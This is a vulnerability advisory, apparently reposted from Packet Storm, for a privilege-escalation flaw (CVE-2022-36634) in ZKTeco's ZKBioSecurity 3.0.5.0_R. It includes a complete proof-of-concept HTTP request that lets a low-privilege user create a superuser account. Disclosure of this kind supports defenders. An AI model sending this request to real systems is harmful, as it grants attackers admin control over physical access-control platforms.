Security
Headlines
HeadlinesLatestCVEs

Headline

ZKSecurity BIO 3.0.5.0_R Privilege Escalation

ZKSecurity BIO version 3.0.5.0_R suffers from a privilege escalation vulnerability.

Packet Storm
#vulnerability#web#ios#linux#intel#bios#auth#firefox

#######################ADVISORY INFORMATION#######################

Product: ZKSecurity BIO

Vendor: ZKTeco

Version Affected: 3.0.5.0_R

CVE: CVE-2022-36634

Vulnerability: User privilege escalation

#######################CREDIT#######################

This vulnerability was discovered and researched by Caio Burgardt and
Silton Santos.

#######################INTRODUCTION#######################

Based on the hybrid biometric technology and computer vision technology,
ZKBioSecurity provides a comprehensive web-based security platform. It
contains multiple integrated modules: personnel, time & attendance, access
control, visitor management, offline & online consumption management, guard
patrol, parking, elevator control, entrance control, Facekiosk, intelligent
video management, mask and temperature detection module, and other smart
sub-systems.

#######################VULNERABILITY DETAILS#######################

The application’s access control management does not check the session’s
permissions correctly. An attacker with “Person Self-Login” or “User”
privilege can create a super user with full privileges in the application

#######################PROOF OF CONCEPT#######################

POST /authUserAction!edit.action HTTP/1.1

Host: {HOST}

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101
Firefox/102.0

Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Content-Type: multipart/form-data;
boundary=---------------------------291763244192371568695079347

Content-Length: 1956

Origin: http://{HOST}:8088

Connection: close

Referer: http://{HOST}:8088/base_index.action

Cookie: <INSERT_LOW-PRIVILEGE_COOKIE_HERE>

Upgrade-Insecure-Requests: 1

-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="authUser.username"

test_privesc

-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="authUser.loginPwd"

KDla123

-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="repassword"

KDla123

-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="authUser.isActive"

true

-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="authUser.isSuperuser"

true

-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="groupIds"

-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="deptIds"

-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="areaIds"

-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="authUser.email"

-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="authUser.name"

-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="authUser.lastName"

-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="fingerTemplate"

-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="fingerId"

-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="logMethod"

add

-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="un"

1657813612925_286

-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="systemCode"

base

-----------------------------291763244192371568695079347–

#######################END#######################

Related news

CVE-2022-36634: ZKBioSecurity 3.0.5- Privilege Escalation to Admin (CVE-2022-36634)

An access control issue in ZKTeco ZKBioSecurity V5000 3.0.5_r allows attackers to arbitrarily create admin users via a crafted HTTP request.

Packet Storm: Latest News

CUPS IPP Attributes LAN Remote Code Execution